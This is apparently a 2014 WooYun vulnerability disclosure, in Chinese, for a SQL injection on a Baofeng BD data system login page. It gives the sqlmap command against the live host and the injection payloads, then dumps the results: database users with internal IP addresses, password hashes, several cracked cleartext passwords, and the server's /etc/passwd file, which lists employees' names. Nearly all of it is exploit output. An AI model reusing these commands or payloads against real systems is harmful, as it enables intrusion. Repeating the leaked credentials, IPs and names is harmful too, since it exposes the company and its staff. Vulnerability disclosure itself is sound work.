暴风影音BD数据系统登录页POST注入

漏洞详情

披露状态:

2014-02-21: 细节已通知厂商并且等待厂商处理中
2014-02-25: 厂商已经确认,细节仅向厂商公开
2014-03-07: 细节向核心白帽子及相关领域专家公开
2014-03-17: 细节向普通白帽子公开
2014-03-27: 细节向实习白帽子公开
2014-04-07: 细节向公众公开

简要描述:

这系统的漏洞有人提交过了,不过貌似没有关于注入的。

详细说明:

./sqlmap.py -u "http://data.bd.baofeng.com/admin/gotologin.box" --data "userBean.name=a&userBean.password=b" -p "userBean.name"

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: userBean.name

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: userBean.name=a' RLIKE (SELECT (CASE WHEN (1690=1690) THEN 0x61 ELSE 0x28 END)) AND 'AAiM'='AAiM&userBean.password=b



Type: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: userBean.name=a' AND 8165=BENCHMARK(5000000,MD5(0x684d696e)) AND 'XOwq'='XOwq&userBean.password=b

---

web application technology: Nginx, JSP

back-end DBMS: MySQL 5

available databases [5]:

[*] bdsystem

[*] information_schema

[*] mysql

[*] test

[*] tmpdir



database management system users [29]:

[*] ''@'localhost'

[*] 'admin'@'60.247.90.102'

[*] 'bdadmin'@'%'

[*] 'bdadmin'@'218.241.188.34'

[*] 'bdadmin'@'localhost'

[*] 'houyi'@'114.112.70.35'

[*] 'houyi'@'114.112.70.45'

[*] 'houyi'@'114.112.70.52'

[*] 'houyi'@'114.112.70.53'

[*] 'houyi'@'114.112.70.54'

[*] 'houyi'@'119.188.128.56'

[*] 'houyi'@'119.188.128.63'

[*] 'jobs'@'114.112.82.15'

[*] 'jobs'@'127.0.0.1'

[*] 'jobs'@'192.168.1.37'

[*] 'jobs'@'192.168.1.43'

[*] 'jobs'@'192.168.1.47'

[*] 'jobs'@'192.168.1.70'

[*] 'jobs'@'192.168.1.94'

[*] 'jobs'@'218.241.188.34'

[*] 'jobs'@'60.247.90.102'

[*] 'jobs'@'localhost'

[*] 'readonly'@'114.112.82.121'

[*] 'readonly'@'119.188.128.151'

[*] 'readonly'@'60.247.90.102'

[*] 'root'@'127.0.0.1'

[*] 'root'@'218.241.188.34'

[*] 'root'@'60.247.90.102'

[*] 'root'@'localhost'





database management system users password hashes:

[*] [1]:

password hash: NULL

[*] admin [1]:

password hash: 5f0c7ef24fa7d213

clear-text password: 223238

[*] bdadmin [2]:

password hash: 53cabe4142c34aab

clear-text password: bdadmin

password hash: 5f0c7ef24fa7d213

clear-text password: 223238

[*] houyi [2]:

password hash: 23c8ee962eaa1d54

password hash: 4b638e533a45b4e1

[*] jobs [1]:

password hash: 055da1c17c3a2a75

[*] readonly [1]:

password hash: *922A4B420903CAD4E7FC56A23122AB927E051FE3

clear-text password: readonly

[*] root [3]:

password hash: 1134dfce21c008f6

password hash: 5f0c7ef24fa7d213

clear-text password: 223238

password hash: NULL





root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/opt/FTP:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

mike:x:10002:10002:Liu Xiaofeng:/home/mike:/bin/bash

yutaka:x:10001:10001:Shi Yu:/home/yutaka:/bin/bash

dingqi:x:10094:10094:dingqi:/home/dingqi:/bin/bash

wangbisheng:x:20028:20028:wangbisheng:/home/wangbisheng:/bin/bash

ntp:x:38:38::/etc/ntp:/sbin/nologin

hadoop:x:30139:30139::/home/hadoop:/bin/bash

scribe:x:101:103:scribe log server user:/var/log/scribe:/bin/bash

rsync:x:501:501:for transfer:/home/rsync:/bin/bash

xiaodong:x:10096:10096:pan xiaodong:/home/xiaodong:/bin/bash

chenwenlong:x:30127:30127:chenwenlong:/home/chenwenlong:/bin/bash

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

www:x:30140:30140::/home/www:/bin/bash

mysql:x:30141:30141::/home/mysql:/bin/bash

yanqing:x:30142:30142::/home/yanqing:/bin/bash

rongyingjie:x:30146:30146:rongyingjie:/home/rongyingjie:/bin/bash

nagios:x:30147:30147::/home/nagios:/bin/bash

zhangpei:x:30281:30281:zhangpei:/home/zhangpei:/bin/bash

wangjiaxu:x:10093:10093:Wang jia xu:/home/wangjiaxu:/bin/bash

chenliang:x:30241:30241:chenliang:/home/chenliang:/bin/bash

luoqi:x:30318:30318:luoqi:/home/luoqi:/bin/bash

修复方案:

你懂的

版权声明:转载请注明来源 Neeke@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-02-25 16:34

厂商回复:

感谢发现并提醒漏洞,我们会尽快处理!谢谢

最新状态:

暂无


漏洞评价: